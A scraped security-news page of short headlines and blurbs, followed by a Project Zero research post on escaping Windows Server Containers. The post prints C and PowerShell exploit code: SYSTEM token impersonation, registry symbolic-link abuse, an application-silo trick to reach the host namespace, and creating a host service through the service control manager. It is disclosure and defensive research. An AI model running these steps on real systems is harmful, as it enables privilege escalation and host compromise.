Published: 2022-06-14 16:18:52
Popularity: 9
Author: Ryan Naraine
Keywords:
L3 Technologies, a U.S. government contractor that sells aerospace and defense technology, has emerged as a suitor for Israeli exploit merchant NSO Group.
Published: 2022-05-19 17:35:51
Popularity: 13
Author: Ryan Naraine
Keywords:
Security researchers at SentinelLabs are calling attention to a software supply chain attack targeting Rust developers with malware aimed directly at infecting GitLab Continuous Integration (CI) pipelines.
Published: 2022-04-12 17:36:50
Popularity: 21
Author: Ryan Naraine
Keywords:
Adobe's security update engine revved into overdrive this month with the release of patches for at least 78 documented software vulnerabilities, some serious enough to expose corporate customers to remote code execution attacks.
Published: 2022-03-17 15:58:58
Popularity: 20
Author: Ryan Naraine
Keywords:
Software supply chain security fears escalated again this week with the discovery of what’s being described as "deliberate sabotage" of code in the open-source npm package manager ecosystem.
Bypassing Little Snitch Firewall with Empty TCP Packets (Rhino Security Labs)
Published: 2021-11-29 19:03:13
Popularity: 23
Author: Ryan Naraine
Keywords:
Video conferencing software giant Zoom has shipped patches for a pair of security defects that expose Windows, macOS, Linux, iOS and Android users to malicious hacker attacks.
Published: 2021-11-16 16:39:16
Popularity: 15
Author: Ryan Naraine
Keywords:
Microsoft-owned GitHub is again flagging major security problems in the npm registry, warning that a pair of newly discovered vulnerabilities continue to expose the soft underbelly of the open-source software supply chain.
Published: 2021-09-29 17:03:38
Popularity: 5
Author: Ryan Naraine
Keywords:
Edge security and content delivery giant Akamai Technologies on Wednesday announced plans to spend $600 million to acquire Guardicore, an Israeli micro-segmentation technology startup. Akamai said the deal would add new capabilities to help customers thwart ransomware attacks by blocking the spread of malware within an already-compromised enterprise.
Published: 2021-09-23 20:39:09
Popularity: 8
Author: Ryan Naraine
Keywords:
Apple on Thursday confirmed a new zero-day exploit hitting older iPhones and warned that the security vulnerability also affects the macOS Catalina platform.
Published: 2021-09-13 21:51:32
Popularity: 29
Author: Ryan Naraine
Keywords:
Google has joined the list of major software providers scrambling to respond to zero-day exploits in the wild.
Published: 2021-08-20 01:04:34
Popularity: None
Author: Ryan Browne
Japanese cryptocurrency exchange Liquid said some of its digital currency wallets have been "compromised."
Published: 2021-08-17 23:14:52
Popularity: 12
Author: Ryan Naraine
Keywords:
Adobe has issued a warning for a pair of major security vulnerabilities affecting its popular Photoshop image manipulation software. The flaws, rated critical, expose both Windows and MacOS users to code execution attacks, Adobe said in an advisory released Tuesday.
Published: 2021-07-13 15:08:49
Popularity: 40
Author: Ryan Naraine
Keywords:
Adobe has issued multiple security advisories with patches for critical vulnerabilities in a wide range of software products, including the ever-present Adobe Acrobat and Reader application.
Published: 2021-04-01 16:06:00
Popularity: 9
Author: Ryan
Posted by James Forshaw, Project Zero
This is a short blog post about a research project I conducted on Windows Server Containers that resulted in four privilege escalations which Microsoft fixed in March 2021. In the post, I describe what led to this research, my research process, and insights into what to look for if you’re researching this area.
Windows 10 and its server counterparts added support for application containerization. The implementation in Windows is similar in concept to Linux containers, but of course wildly different. The well-known Docker platform supports Windows containers, which leads to the availability of related projects such as Kubernetes running on Windows. You can read a bit of background on Windows containers on MSDN. I’m not going to go into any depth on how containers work in Linux, as very little of it is applicable to Windows.
The primary goal of a container is to hide the real OS from an application. For example, in Docker you can download a standard container image which contains a completely separate copy of Windows. The image is used to build the container which uses a feature of the Windows kernel called a Server Silo allowing for redirection of resources such as the object manager, registry and networking. The server silo is a special type of Job object, which can be assigned to a process.
The application running in the container, as far as possible, will believe it’s running in its own unique OS instance. Any changes it makes to the system will only affect the container and not the real OS which is hosting it. This allows an administrator to bring up new instances of the application easily as any system or OS differences can be hidden.
For example the container could be moved between different Windows systems, or even to a Linux system with the appropriate virtualization and the application shouldn’t be able to tell the difference. Containers shouldn’t be confused with virtualization however, which provides a consistent hardware interface to the OS. A container is more about providing a consistent OS interface to applications.
Realistically, containers are mainly about using their isolation primitives for hiding the real OS and providing a consistent configuration in which an application can execute. However, there’s also some potential security benefit to running inside a container, as the application shouldn’t be able to directly interact with other processes and resources on the host.
There are two supported types of containers: Windows Server Containers and Hyper-V Isolated Containers. Windows Server Containers run under the current kernel as separate processes inside a server silo. Therefore a single kernel vulnerability would allow you to escape the container and access the host system.
Hyper-V Isolated Containers still run in a server silo, but do so in a separate lightweight VM. You can still use the same kernel vulnerability to escape the server silo, but you’re still constrained by the VM and hypervisor. To fully escape and access the host you’d need a separate VM escape as well.
The current MSRC security servicing criteria states that Windows Server Containers are not a security boundary as you still have direct access to the kernel. However, if you use Hyper-V isolation, a silo escape wouldn’t compromise the host OS directly as the security boundary is at the hypervisor level. That said, escaping the server silo is likely to be the first step in attacking Hyper-V containers meaning an escape is still useful as part of a chain.
As Windows Server Containers are not a security boundary any bugs in the feature won’t result in a security bulletin being issued. Any issues might be fixed in the next major version of Windows, but they might not be.
Over a year ago I was asked for some advice by Daniel Prizmant, a researcher at Palo Alto Networks, about some details of Windows object manager symbolic links. Daniel was doing research into Windows containers and wanted help with a feature that allows symbolic links to be marked as global, which allows them to reference objects outside the server silo. I recommend reading Daniel’s blog post for more in-depth information about Windows containers.
Knowing a little bit about symbolic links I was able to help fill in some details and usage. About seven months later Daniel released a second blog post, this time describing how to use global symbolic links to escape a server silo Windows container. The result of the exploit is the user in the container can access resources outside of the container, such as files.
The global symbolic link feature needs SeTcbPrivilege to be enabled, which can only be accessed from SYSTEM. The exploit therefore involved injecting into a SYSTEM process from the default administrator user and running the exploit from there. Based on the blog post, I thought it could be done more easily, without injection: you could impersonate a SYSTEM token and do the exploit all in-process. I wrote a simple proof-of-concept in PowerShell and put it up on Github.
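For illustration, the in-process approach boils down to standard token duplication and impersonation. Below is a minimal C sketch, not the actual PoC: it assumes the caller is already an administrator with sufficient access to a SYSTEM process, whose PID is a hypothetical input, and omits error handling.

#include <windows.h>

// Sketch: duplicate a SYSTEM process token as an impersonation token and
// attach it to the current thread.
BOOL ImpersonateSystemFromPid(DWORD pid) {
  BOOL ok = FALSE;
  HANDLE proc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
  if (!proc) return FALSE;
  HANDLE token = NULL, dup = NULL;
  if (OpenProcessToken(proc, TOKEN_DUPLICATE, &token) &&
      DuplicateTokenEx(token, TOKEN_QUERY | TOKEN_IMPERSONATE, NULL,
                       SecurityImpersonation, TokenImpersonation, &dup)) {
    // SetThreadToken applies the impersonation token to this thread only.
    ok = SetThreadToken(NULL, dup);
  }
  if (dup) CloseHandle(dup);
  if (token) CloseHandle(token);
  CloseHandle(proc);
  return ok;
}

With the SYSTEM token on the thread, SeTcbPrivilege can then be enabled and the global symbolic link created, all without injecting code into another process.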
Fast forward another few months and a Googler reached out to ask me some questions about Windows Server Containers. Another researcher at Palo Alto Networks had reported to Google Cloud that Google Kubernetes Engine (GKE) was vulnerable to the issue Daniel had identified. Google Cloud was using Windows Server Containers to run Kubernetes, so it was possible to escape the container and access the host, which was not supposed to be accessible.
Microsoft had not patched the issue and it was still exploitable, because Microsoft does not consider these issues to be serviceable. Therefore the GKE team was looking for mitigations. One proposed mitigation was to force the containers to run under the ContainerUser account instead of ContainerAdministrator. As the reported issue only works when running as an administrator, that would seem to be sufficient.
However, I wasn’t convinced there weren't similar vulnerabilities which could be exploited from a non-administrator user. Therefore I decided to do my own research into Windows Server Containers to determine if the guidance of using ContainerUser would really eliminate the risks.
While I wasn’t expecting Microsoft to fix anything I found, the research would at least allow me to provide internal feedback to the GKE team so they could better mitigate the issues. It would also establish a rough baseline of the risks involved in using Windows Server Containers. They’re known to be problematic, but how problematic?
The first step was to get some code running in a representative container. Nothing that had been reported was specific to GKE, so I made the assumption I could just run a local Windows Server Container.
Setting up your own server silo from scratch is undocumented and almost certainly unnecessary. When you enable the Container support feature in Windows, the Hyper-V Host Compute Service is installed. This takes care of setting up both Hyper-V and process isolated containers. The API to interact with this service isn’t officially documented, however Microsoft has provided public wrappers (with scant documentation), for example this is the Go wrapper.
Realistically it’s best to just use Docker, which takes the MS-provided Go wrapper and implements the more familiar Docker CLI. While there are likely to be Docker-specific escapes, the core functionality of a Windows Docker container is all provided by Microsoft, so it would be in scope. Note, there are two versions of Docker: Enterprise, which is only for server systems, and Desktop. I primarily used Desktop for convenience.
As an aside, MSRC does not count any issue as crossing a security boundary where being a member of the Hyper-V Administrators group is a prerequisite. Using the Hyper-V Host Compute Service requires membership of the Hyper-V Administrators group. However Docker runs at sufficient privilege to not need the user to be a member of the group. Instead access to Docker is gated by membership of the separate docker-users group. If you get code running under a non-administrator user that has membership of the docker-users group you can use that to get full administrator privileges by abusing Docker’s server silo support.
Fortunately for me most Windows Docker images come with .NET and PowerShell installed so I could use my existing toolset. I wrote a simple docker file containing the following:
FROM mcr.microsoft.com/windows/servercore:20H2
USER ContainerUser
COPY NtObjectManager c:/NtObjectManager
CMD [ "powershell", "-noexit", "-command", \
      "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]
This docker file will download a Windows Server Core 20H2 container image from the Microsoft Container Registry, copy in my NtObjectManager PowerShell module and then set up a command to load that module on startup. I also specified that the PowerShell process would run as the user ContainerUser so that I could test the mitigation assumptions. If you don’t specify a user it’ll run as ContainerAdministrator by default.
Note, when using process isolation mode the container image version must match the host OS. This is because the kernel is shared between the host and the container and any mismatch between the user-mode code and the kernel could result in compatibility issues. Therefore if you’re trying to replicate this you might need to change the name for the container image.
Create a directory and save the docker file contents to a file named dockerfile in that directory. Also copy my PowerShell module into the same directory under the NtObjectManager subdirectory. Then, from a command prompt in that directory, run the following commands to build and run the container.
C:\container> docker build -t test_image .
Step 1/4 : FROM mcr.microsoft.com/windows/servercore:20H2
 ---> b29adf5cd4f0
Step 2/4 : USER ContainerUser
 ---> Running in ac03df015872
Removing intermediate container ac03df015872
 ---> 31b9978b5f34
Step 3/4 : COPY NtObjectManager c:/NtObjectManager
 ---> fa42b3e6a37f
Step 4/4 : CMD [ "powershell", "-noexit", "-command", "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]
 ---> Running in 86cad2271d38
Removing intermediate container 86cad2271d38
 ---> e7d150417261
Successfully built e7d150417261
Successfully tagged test_image:latest

C:\container> docker run --isolation=process -it test_image
PS>
I wanted to run code using process isolation rather than in Hyper-V isolation, so I needed to specify the --isolation=process argument. This would allow me to more easily see system interactions as I could directly debug container processes if needed. For example, you can use Process Monitor to monitor file and registry access. Docker Enterprise uses process isolation by default, whereas Desktop uses Hyper-V isolation.
I now had a PowerShell console running inside the container as ContainerUser. A quick way to check that it was successful is to try and find the CExecSvc process, which is the Container Execution Agent service. This service is used to spawn your initial PowerShell console.
PS> Get-Process -Name CExecSvc
Handles  NPM(K)  PM(K)  WS(K)  CPU(s)    Id  SI  ProcessName
-------  ------  -----  -----  ------    --  --  -----------
     86       6   1044   5020          4560   6  CExecSvc
With a running container it was time to start poking around to see what’s available. The first thing I did was dump the ContainerUser’s token just to see what groups and privileges were assigned. You can use the Show-NtTokenEffective command to do that.
PS> Show-NtTokenEffective -User -Group -Privilege
USER INFORMATION
----------------
Name                       Sid
----                       ---
User Manager\ContainerUser S-1-5-93-2-2

GROUP SID INFORMATION
---------------------
Name                                   Attributes
----                                   ----------
Mandatory Label\High Mandatory Level   Integrity, ...
Everyone                               Mandatory, ...
BUILTIN\Users                          Mandatory, ...
NT AUTHORITY\SERVICE                   Mandatory, ...
CONSOLE LOGON                          Mandatory, ...
NT AUTHORITY\Authenticated Users       Mandatory, ...
NT AUTHORITY\This Organization         Mandatory, ...
NT AUTHORITY\LogonSessionId_0_10357759 Mandatory, ...
LOCAL                                  Mandatory, ...
User Manager\AllContainers             Mandatory, ...

PRIVILEGE INFORMATION
---------------------
Name                          Luid              Enabled
----                          ----              -------
SeChangeNotifyPrivilege       00000000-00000017 True
SeImpersonatePrivilege        00000000-0000001D True
SeCreateGlobalPrivilege       00000000-0000001E True
SeIncreaseWorkingSetPrivilege 00000000-00000021 False
The groups didn’t seem that interesting; however, looking at the privileges we can see SeImpersonatePrivilege. If you have this privilege you can impersonate any other user on the system, including administrators. MSRC considers SeImpersonatePrivilege to be administrator-equivalent, meaning if you have it you can assume you can get to administrator. It seems ContainerUser is not quite as normal as it should be.
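You don't need my toolchain to perform this kind of check. A rough C equivalent of the privilege listing, using only documented APIs (a sketch with minimal error handling, far less complete than Show-NtTokenEffective):

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

// Sketch: list the current process token's privileges, so the presence of
// the admin-equivalent SeImpersonatePrivilege is easy to spot.
int main(void) {
  HANDLE token;
  if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token))
    return 1;
  DWORD len = 0;
  GetTokenInformation(token, TokenPrivileges, NULL, 0, &len);
  PTOKEN_PRIVILEGES privs = (PTOKEN_PRIVILEGES)malloc(len);
  if (!privs || !GetTokenInformation(token, TokenPrivileges, privs, len, &len))
    return 1;
  for (DWORD i = 0; i < privs->PrivilegeCount; i++) {
    WCHAR name[64];
    DWORD name_len = 64;
    // Resolve the LUID back to a name such as SeImpersonatePrivilege.
    if (LookupPrivilegeNameW(NULL, &privs->Privileges[i].Luid, name, &name_len))
      wprintf(L"%ls%ls\n", name,
              (privs->Privileges[i].Attributes & SE_PRIVILEGE_ENABLED)
                  ? L" (enabled)" : L"");
  }
  free(privs);
  CloseHandle(token);
  return 0;
}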
That was a very bad (or good) start to my research. The prior assumption was that running as ContainerUser would not grant administrator privileges, and therefore the global symbolic link issue couldn’t be directly exploited. However that turns out to not be the case in practice. As an example you can use the public RogueWinRM exploit to get a SYSTEM token as long as WinRM isn’t enabled, which is the case on most Windows container images. There are no doubt other less well known techniques to achieve the same thing. The code which creates the user account is in CExecSvc, which is code owned by Microsoft and is not specific to Docker.
Next, I used the NtObject drive provider to list the object manager namespace. For example, checking the Device directory shows which device objects are available.
PS> ls NtObject:\Device
Name                                               TypeName
----                                               --------
Ip                                                 SymbolicLink
Tcp6                                               SymbolicLink
Http                                               Directory
Ip6                                                SymbolicLink
ahcache                                            SymbolicLink
WMIDataDevice                                      SymbolicLink
LanmanDatagramReceiver                             SymbolicLink
Tcp                                                SymbolicLink
LanmanRedirector                                   SymbolicLink
DxgKrnl                                            SymbolicLink
ConDrv                                             SymbolicLink
Null                                               SymbolicLink
MailslotRedirector                                 SymbolicLink
NamedPipe                                          Device
Udp6                                               SymbolicLink
VhdHardDisk{5ac9b14d-61f3-4b41-9bbf-a2f5b2d6f182}  SymbolicLink
KsecDD                                             SymbolicLink
DeviceApi                                          SymbolicLink
MountPointManager                                  Device
...
Interestingly, most of the device drivers are symbolic links (almost certainly global) instead of actual device objects, but there are a few real device objects available. Even the VHD disk volume is a symbolic link to a device outside the container. There are likely things lurking in accessible devices which could be exploited, but I was still in reconnaissance mode.
What about the registry? The container should be providing its own Registry hives and so there shouldn’t be anything accessible outside of that. After a few tests I noticed something very odd.
PS> ls HKLM:\SOFTWARE | Select-Object Name
Name
----
HKEY_LOCAL_MACHINE\SOFTWARE\Classes
HKEY_LOCAL_MACHINE\SOFTWARE\Clients
HKEY_LOCAL_MACHINE\SOFTWARE\DefaultUserEnvironment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
HKEY_LOCAL_MACHINE\SOFTWARE\ODBC
HKEY_LOCAL_MACHINE\SOFTWARE\OpenSSH
HKEY_LOCAL_MACHINE\SOFTWARE\Policies
HKEY_LOCAL_MACHINE\SOFTWARE\RegisteredApplications
HKEY_LOCAL_MACHINE\SOFTWARE\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node

PS> ls NtObject:\REGISTRY\MACHINE\SOFTWARE | Select-Object Name
Name
----
Classes
Clients
DefaultUserEnvironment
Docker Inc.
Intel
Macromedia
Microsoft
ODBC
OEM
OpenSSH
Partner
Policies
RegisteredApplications
Windows
WOW6432Node
The first command is querying the local machine SOFTWARE hive using the built-in Registry drive provider. The second command is using my module’s object manager provider to list the same hive. If you look closely the list of keys is different between the two commands. Maybe I made a mistake somehow? I checked some other keys, for example the user hive attachment point:
PS> ls NtObject:\REGISTRY\USER | Select-Object Name
Name
----
.DEFAULT
S-1-5-19
S-1-5-20
S-1-5-21-426062036-3400565534-2975477557-1001
S-1-5-21-426062036-3400565534-2975477557-1001_Classes
S-1-5-21-426062036-3400565534-2975477557-1003
S-1-5-18

PS> Get-NtSid
Name                       Sid
----                       ---
User Manager\ContainerUser S-1-5-93-2-2
No, it still looked wrong. The ContainerUser’s SID is S-1-5-93-2-2, so you’d expect to see a loaded hive for that user SID. However, you don’t see one; instead you see S-1-5-21-426062036-3400565534-2975477557-1001, which is the SID of the user outside the container.
Something funny was going on. However, this behavior is something I’ve seen before. Back in 2016 I reported a bug with application hives where you couldn’t open the \REGISTRY\A attachment point directly, but you could if you opened \REGISTRY then did a relative open to A. It turns out that by luck my registry enumeration code in the module’s drive provider uses relative opens using the native system calls, whereas the PowerShell built-in uses absolute opens through the Win32 APIs. Therefore, this was a manifestation of a similar bug: doing a relative open was ignoring the registry overlays and giving access to the real hive.
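The difference between the two open styles is easy to see at the native API level. A minimal C sketch (error handling omitted; NtOpenKey is exported from ntdll but has no public user-mode header, so it's declared manually here and linked against ntdll.lib):

#include <windows.h>
#include <winternl.h>

#pragma comment(lib, "ntdll.lib")

// ntdll export with no declaration in winternl.h.
NTSTATUS NTAPI NtOpenKey(PHANDLE KeyHandle, ACCESS_MASK DesiredAccess,
                         POBJECT_ATTRIBUTES ObjectAttributes);

int main(void) {
  UNICODE_STRING path;
  OBJECT_ATTRIBUTES oa;
  HANDLE registry, key_abs, key_rel;

  // Absolute open: the full path is resolved in one lookup, which (inside a
  // container) goes through the silo's registry overlay.
  RtlInitUnicodeString(&path, L"\\REGISTRY\\MACHINE\\SOFTWARE");
  InitializeObjectAttributes(&oa, &path, OBJ_CASE_INSENSITIVE, NULL, NULL);
  NtOpenKey(&key_abs, KEY_READ, &oa);

  // Relative open: open \REGISTRY first, then resolve the rest relative to
  // that handle. Per the bug, this path ignored the overlays.
  RtlInitUnicodeString(&path, L"\\REGISTRY");
  InitializeObjectAttributes(&oa, &path, OBJ_CASE_INSENSITIVE, NULL, NULL);
  NtOpenKey(&registry, KEY_READ, &oa);
  RtlInitUnicodeString(&path, L"MACHINE\\SOFTWARE");
  InitializeObjectAttributes(&oa, &path, OBJ_CASE_INSENSITIVE, registry, NULL);
  NtOpenKey(&key_rel, KEY_READ, &oa);
  return 0;
}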
This grants a non-administrator user access to any registry key on the host, as long as ContainerUser can pass the key’s access check. You could imagine the host storing some important data in the registry which the container can now read out, however using this to escape the container would be hard. That said, all you need to do is abuse SeImpersonatePrivilege to get administrator access and you can immediately start modifying the host’s registry hives.
The fact that I had two bugs in less than a day was somewhat concerning, however at least that knowledge can be applied to any mitigation strategy. I thought I should dig a bit deeper into the kernel to see what else I could exploit from a normal user.
While just doing basic inspection has been surprisingly fruitful it was likely to need some reverse engineering to shake out anything else. I know from previous experience on Desktop Bridge how the registry overlays and object manager redirection works when combined with silos. In the case of Desktop Bridge it uses application silos rather than server silos but they go through similar approaches.
The main enforcement mechanism used by the kernel to provide the container’s isolation is calling a function to check whether the process is in a silo and doing something different based on the result. I decided to try and track down where the silo state was checked and see if I could find any misuse. You’d think the kernel would only have a few functions which return the current silo state. Unfortunately, you’d be wrong; the following is a short list of the functions I checked:
IoGetSilo, IoGetSiloParameters, MmIsSessionInCurrentServerSilo,
OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO, ObGetSiloRootDirectoryPath,
ObpGetSilosRootDirectory, PsGetCurrentServerSilo, PsGetCurrentServerSiloGlobals,
PsGetCurrentServerSiloName, PsGetCurrentSilo, PsGetEffectiveServerSilo,
PsGetHostSilo, PsGetJobServerSilo, PsGetJobSilo, PsGetParentSilo,
PsGetPermanentSiloContext, PsGetProcessServerSilo, PsGetProcessSilo,
PsGetServerSiloActiveConsoleId, PsGetServerSiloGlobals,
PsGetServerSiloServiceSessionId, PsGetServerSiloState, PsGetSiloBySessionId,
PsGetSiloContainerId, PsGetSiloContext, PsGetSiloIdentifier,
PsGetSiloMonitorContextSlot, PsGetThreadServerSilo,
PsIsCurrentThreadInServerSilo, PsIsHostSilo, PsIsProcessInAppSilo,
PsIsProcessInSilo, PsIsServerSilo, PsIsThreadInSilo
Of course that’s not a comprehensive list of functions, but those are the ones that looked most likely to either return a silo and its properties or check whether something was in a silo. Checking the references to these functions was never going to be comprehensive either, for various reasons, but it was a reasonable place to start.
The first issue I found was due to a call to PsIsCurrentThreadInServerSilo. I noticed a reference to the function inside CmpOKToFollowLink, the function responsible for enforcing symbolic link checks in the registry. At a basic level, registry symbolic links are not allowed to traverse from an untrusted hive to a trusted hive.
For example if you put a symbolic link in the current user’s hive which redirects to the local machine hive the CmpOKToFollowLink will return FALSE when opening the key and the operation will fail. This prevents a user planting symbolic links in their hive and finding a privileged application which will write to that location to elevate privileges.
BOOLEAN CmpOKToFollowLink(PCMHIVE SourceHive, PCMHIVE TargetHive) {
  if (PsIsCurrentThreadInServerSilo()
      || !TargetHive
      || TargetHive == SourceHive) {
    return TRUE;
  }
  if (SourceHive->Flags.Trusted)
    return FALSE;
  // Check trust list.
}
Looking at CmpOKToFollowLink we can see where PsIsCurrentThreadInServerSilo is being used. If the current thread is in a server silo then all links are allowed between any hives. The check for the trusted state of the source hive only happens after this initial check so is bypassed. I’d speculate that during development the registry overlays couldn’t be marked as trusted so a symbolic link in an overlay would not be followed to a trusted hive it was overlaying, causing problems. Someone presumably added this bypass to get things working, but no one realized they needed to remove it when support for trusted overlays was added.
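For context, planting such a link from user mode is straightforward with the native API: create a key with REG_OPTION_CREATE_LINK and write the target path into its SymbolicLinkValue value. A hedged C sketch follows (illustrative paths, error handling omitted, ntdll declarations supplied manually as before):

#include <windows.h>
#include <winternl.h>

#pragma comment(lib, "ntdll.lib")

// ntdll exports with no public user-mode prototypes.
NTSTATUS NTAPI NtCreateKey(PHANDLE KeyHandle, ACCESS_MASK DesiredAccess,
                           POBJECT_ATTRIBUTES ObjectAttributes,
                           ULONG TitleIndex, PUNICODE_STRING Class,
                           ULONG CreateOptions, PULONG Disposition);
NTSTATUS NTAPI NtSetValueKey(HANDLE KeyHandle, PUNICODE_STRING ValueName,
                             ULONG TitleIndex, ULONG Type, PVOID Data,
                             ULONG DataSize);

int main(void) {
  UNICODE_STRING name, value_name;
  OBJECT_ATTRIBUTES oa;
  HANDLE key;

  // Create the link key itself (this path is purely illustrative).
  RtlInitUnicodeString(&name,
      L"\\REGISTRY\\USER\\S-1-5-93-2-2\\Software\\LinkDemo");
  InitializeObjectAttributes(&oa, &name, OBJ_CASE_INSENSITIVE, NULL, NULL);
  NtCreateKey(&key, KEY_ALL_ACCESS, &oa, 0, NULL,
              REG_OPTION_CREATE_LINK, NULL);

  // Point it at a key in the trusted machine hive. With the
  // PsIsCurrentThreadInServerSilo bypass, the kernel would follow this
  // untrusted-to-trusted link inside a container.
  WCHAR target[] = L"\\REGISTRY\\MACHINE\\SOFTWARE\\SomePrivilegedKey";
  RtlInitUnicodeString(&value_name, L"SymbolicLinkValue");
  NtSetValueKey(key, &value_name, 0, REG_LINK, target,
                sizeof(target) - sizeof(WCHAR));  // no null terminator
  return 0;
}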
To exploit this in a container I needed to find a privileged kernel component which would write to a registry key that I could control. I found a good primitive inside Win32k for supporting FlickInfo configuration (which seems to be related in some way to touch input, but it’s not documented). When setting the configuration Win32k would create a known key in the current user’s hive. I could then redirect the key creation to the local machine hive allowing creation of arbitrary keys in a privileged location. I don’t believe this primitive could be directly combined with the registry silo escape issue but I didn’t investigate too deeply. At a minimum this would allow a non-administrator user to elevate privileges inside a container, where you could then use registry silo escape to write to the host registry.
The second issue was due to a call to OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO. This function would get the root object manager namespace directory for a silo.
POBJECT_DIRECTORY OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(PEJOB Silo) {
  if (Silo) {
    PPSP_STORAGE Storage = Silo->Storage;
    PPSP_SLOT Slot = Storage->Slot[PsObjectDirectorySiloContextSlot];
    if (Slot->Present)
      return Slot->Value;
  }
  return ObpRootDirectoryObject;
}
We can see that the function extracts a storage parameter from the passed-in silo; if the slot is present, it returns the slot's value. If the silo is NULL or the slot isn’t present, the global root directory stored in ObpRootDirectoryObject is returned. When a server silo is set up, the slot is populated with a new root directory, so this function should always return the silo root directory rather than the real global root directory.
This code seems perfectly fine: if a server silo is passed in, it should always return the silo root object directory. The real question is, what silo do the callers of this function actually pass in? We can check that easily enough; there are only two callers, and they both have the following code.
PEJOB silo = PsGetCurrentSilo();
Root = OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(silo);
Okay, so the silo is coming from PsGetCurrentSilo. What does that do?
PEJOB PsGetCurrentSilo() {
  PETHREAD Thread = PsGetCurrentThread();
  PEJOB silo = Thread->Silo;
  if (silo == (PEJOB)-3) {
    silo = Thread->Tcb.Process->Job;
    while (silo) {
      if (silo->JobFlags & EJOB_SILO) {
        break;
      }
      silo = silo->ParentJob;
    }
  }
  return silo;
}
A silo can be associated with a thread through impersonation, or it can be one of the jobs in the hierarchy of jobs associated with a process. This function first checks if the thread is in a silo. If not, signified by the -3 placeholder, it searches the process's job hierarchy for any job which has the JOB_SILO flag set. If a silo is found, it’s returned from the function; otherwise NULL is returned.
This is a problem, as it’s not explicitly checking for a server silo. I mentioned earlier that there are two types of silo: application and server. While creating a new server silo requires administrator privileges, creating an application silo requires no privileges at all. Therefore, to trick the object manager into using the real root directory, all we need to do is create an application silo with no root directory and assign it to our process: PsGetCurrentSilo returns the application silo, the root-directory slot lookup fails, and the kernel falls back to ObpRootDirectoryObject.
This is basically a more powerful version of the global symlink vulnerability, but it requires no administrator privileges to function. Again, as with the registry issue, you’re still limited in what you can modify outside of the container based on the token in the container. But you can read files on disk, or interact with ALPC ports on the host system.
The exploit in PowerShell is pretty straightforward using my toolchain:
PS> $root = Get-NtDirectory "\"
PS> $root.FullPath
\

PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory
PS> Set-NtProcessJob $silo -Current
PS> $root.FullPath
\Silos\748
To test the exploit we first open the current root directory object and then print its full path as the kernel sees it. Even though the silo root isn’t really a root directory the kernel makes it look like it is by returning a single backslash as the path.
We then create the application silo using the New-NtJob command. You need to specify NoSiloRootDirectory to prevent the code trying to create a root directory which we don’t want and can’t be done from a non-administrator account anyway. We can then assign the application silo to the process.
Now we can check the root directory path again. We find the root directory is really called \Silos\748 instead of just a single backslash. This is because the kernel is now using the real root directory. At this point you can access resources on the host through the object manager.
We can now combine these issues to escape the container completely from ContainerUser. First get hold of an administrator token through something like RogueWinRM, then impersonate it thanks to SeImpersonatePrivilege. Then use the object manager root directory issue to access the host’s service control manager (SCM) over its ALPC port and create a new service. You don’t even need to copy an executable outside the container, as the container’s system volume is a device the host can access directly.
As far as the host’s SCM is concerned you’re an administrator, so it’ll grant you full access to create an arbitrary service. However, when that service starts it’ll run on the host, not in the container, removing all restrictions. One quirk which can make exploitation unreliable is that the SCM’s RPC handle can be cached by the Win32 APIs. If any connection is made to the SCM in any part of PowerShell before installing the service, you will end up accessing the container’s SCM, not the host’s.
To get around this issue we can just access the RPC service directly using NtObjectManager’s RPC commands.
PS> $imp = $token.Impersonate()
PS> $sym_path = "$env:SystemDrive\symbols"
PS> mkdir $sym_path | Out-Null
PS> $services_path = "$env:SystemRoot\system32\services.exe"
PS> $cmd = 'cmd /C echo "Hello World" > \hello.txt'
# You can also use the following to run a container based executable.
#$cmd = Use-NtObject($f = Get-NtFile -Win32Path "demo.exe") {
#   "\\.\GLOBALROOT" + $f.FullPath
#}

PS> Get-Win32ModuleSymbolFile -Path $services_path -OutPath $sym_path
PS> $rpc = Get-RpcServer $services_path -SymbolPath $sym_path | `
       Select-RpcServer -InterfaceId '367abb81-9844-35f1-ad32-98f038001003'
PS> $client = Get-RpcClient $rpc

PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory
PS> Set-NtProcessJob $silo -Current
PS> Connect-RpcClient $client -EndpointPath ntsvcs

PS> $scm = $client.ROpenSCManagerW([NullString]::Value, `
       [NullString]::Value, `
       [NtApiDotNet.Win32.ServiceControlManagerAccessRights]::CreateService)
PS> $service = $client.RCreateServiceW($scm.p3, "GreatEscape", "", `
       [NtApiDotNet.Win32.ServiceAccessRights]::Start, 0x10, 0x3, 0, $cmd, `
       [NullString]::Value, $null, $null, 0, [NullString]::Value, $null, 0)
PS> $client.RStartServiceW($service.p15, 0, $null)
For this code to work it’s expected you have an administrator token in the $token variable to impersonate. Getting that token is left as an exercise for the reader. When you run it in a container the result should be the file hello.txt written to the root of the host’s system drive.
I have some server silo escapes, now what? I would prefer to get them fixed, however as already mentioned MSRC servicing criteria pointed out that Windows Server Containers are not a supported security boundary.
I decided to report the registry symbolic link issue immediately, as I could argue that was something which would allow privilege escalation inside a container from a non-administrator. This would fit within the scope of a normal bug I’d find in Windows, it just required a special environment to function. This was issue 2120 which was fixed in February 2021 as CVE-2021-24096. The fix was pretty straightforward, the call to PsIsCurrentThreadInServerSilo was removed as it was presumably redundant.
The issue with ContainerUser having SeImpersonatePrivilege could be by design. I couldn’t find any official Microsoft or Docker documentation describing the behavior so I was wary of reporting it. That would be like reporting that a normal service account has the privilege, which is by design. So I held off on reporting this issue until I had a better understanding of the security expectations.
The situation with the other two silo escapes was more complicated, as they explicitly crossed an undefended boundary. There was little point reporting them to Microsoft if they wouldn’t be fixed. There would be more value in publicly releasing the information so that any users of the containers could try and find mitigating controls, or stop using Windows Server Containers for anything where untrusted code could ever run.
